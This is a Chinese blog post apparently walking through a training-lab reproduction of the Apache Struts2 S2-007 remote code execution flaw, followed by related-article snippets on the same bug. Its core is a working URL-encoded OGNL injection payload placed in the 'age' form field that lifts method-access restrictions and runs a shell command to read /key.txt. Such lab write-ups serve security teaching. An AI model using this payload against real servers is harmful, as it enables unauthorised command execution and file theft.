墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现

最新推荐文章于 2023-06-19 21:05:38 发布
最新推荐文章于 2023-06-19 21:05:38 发布
阅读量5.5k 收藏
点赞数
文章标签: 墨者学院 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc_de_csdn/article/details/100070897
版权
  1. 打开靶场,任意填写表单并提交
  2. 使用BrupSuite捕获报文
  3. 修改age的值为:
  4. %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat /key.txt%27%29.getInputStream%28%29%29%29+%2B+%27
  5. 得到KEY
cc_de_csdn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用权限管理等功能,能有效阻止防火墙和杀毒软件尚未识别的安全危险,从源头上杜绝病毒的侵入,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全防护。 * 在管理员用户下也可以轻松开启免疫隔离术 * 优化各项监控,保护更全面 * 增强 U 盘病毒免疫,彻底防御 U 盘病毒 * 优化了与输入法的不兼容性问题 * 优化了与IE浏览器的不兼容性问题 * 软件界面全新优化,资源占用更低,产品更稳定 安装后可以免费安装趋势科技2008版,可以一年免费升级。 自己使用下来的感觉,墨者真的是一个看门的好东西,一切访问注册表,系统主要文件,往系统里面写东西都要通过墨者授权,可能稍微有些麻烦,但是给我们带来了安全,我是强烈推荐的。比360安全卫士更好,安全系数更高。
Struts S2-007复现
ZJT6666666的博客
12-21 339
Struts S2-007复现
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 3212
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
墨者Apache Struts2远程代码执行漏洞(S2-016)题解
zr1213159840的博客
01-11 920
在网上找了一下s2-106的漏洞情况,参考链接如下: https://www.jianshu.com/p/de165430e8a8 在这个链接的最后,我们知道对漏洞进行验证的方法,就是在链接的最后添加相应的表达式 (这类表达式似乎有相同的名字)。 针对这题,我们可以在后面添加index.action?redirect%25{3*4} 即完整链接为 http://219.153.49.228:48753/index.action?redirect:%25%7B3*4%7D 注意后面的链接要进行编码处理 按下
CTF-Apache Struts2远程代码执行漏洞(S2-007)复现
asd158923328的博客
08-21 420
根据题意 形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。 进入环境,查看源码, 限制了三个输入框的的值只能为text,而且长度在540以上, 然后在登录界面用户名和邮箱值随意,age部分改为我们的payload ’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java...
S2-007漏洞复现
baidu_38844729的博客
11-14 286
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
Struts2 漏洞复现s2-007
weixin_51220765的博客
12-14 1025
Struts2 漏洞复现s2-007 原理: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞 1.到007下 cd vulhub-master/struts2/s2-007 2.启动007 docker-compose up -d 3.访问靶机ip:8080 注意:如果此时报404错误,不要慌哦~ 我们去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!具体步骤如下: 当页面回复正常后,我们就可以继续进行咯~ 3
漏洞复现----29、Struts2/S2-007
七天
06-29 1031
影响版本 2.0.0 - 2.2.3 漏洞原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: (…) public class UserAction extends Ac
vulhub-struts2-S2-007 远程代码执行漏洞复现
qq_56426046的博客
06-19 228
影响版本: 2.0.0 - 2.2.3。
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
spring IOC实现(墨者革离)
12-12
代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
计算机专业Java专业课程实验+CRM客户关系管理系统设计学生课程实验.zip
05-01
学生课程实验:大二计算机专业JAVA专业课的课程实验,设计一个CRM的客户关系管理系统,含项目源码、数据库、以及汇报PPT。 内容目录: ├── readme.txt ├── 基于Java的CRM客户关系管理系统的设计和实现数据库 │ └── crm.sql ├── 基于Java的CRM客户关系管理系统的设计和实现项目源代码 │ └── MyCrm.zip ├── 基于Java的CRM客户关系管理系统的设计和实现项目运行截图 │ ├── 主界面.PNG │ ├── 产品信息管理.PNG │ ├── 客户信息添加.PNG │ ├── 登录.PNG │ └── 角色管理.PNG ├── 视频 │ ├── 1CRM客户关系管理系统_项目的配置以及启动.url │ ├── 2CRM客户关系管理系统_工作桌面_信息中心_邮箱功能_客户管理_订单管理.url │ └── 3CRM客户关系管理系统_财务管理_产品管理_部门管理_岗位管理_数据回收站_权限管.url └── 论文 ├── 基于Java的现代数字化CRM客户关系管理系统答辩ppt.pptx
node-v12.17.0-linux-arm64.tar.xz
最新发布
05-01
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
常见移动变现术语(mobile monetization).docx
05-01
常见移动变现术语(mobile monetization).docx
废物转运站:决策指南 垃圾转运站:决策指南
05-01
废物转运站:决策指南
冰蓄冷的一些资料.zip
05-01
冰蓄冷的一些资料:包括系统的原理图,设计计算等
8. Django 表单与模型
05-01
配套资源
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值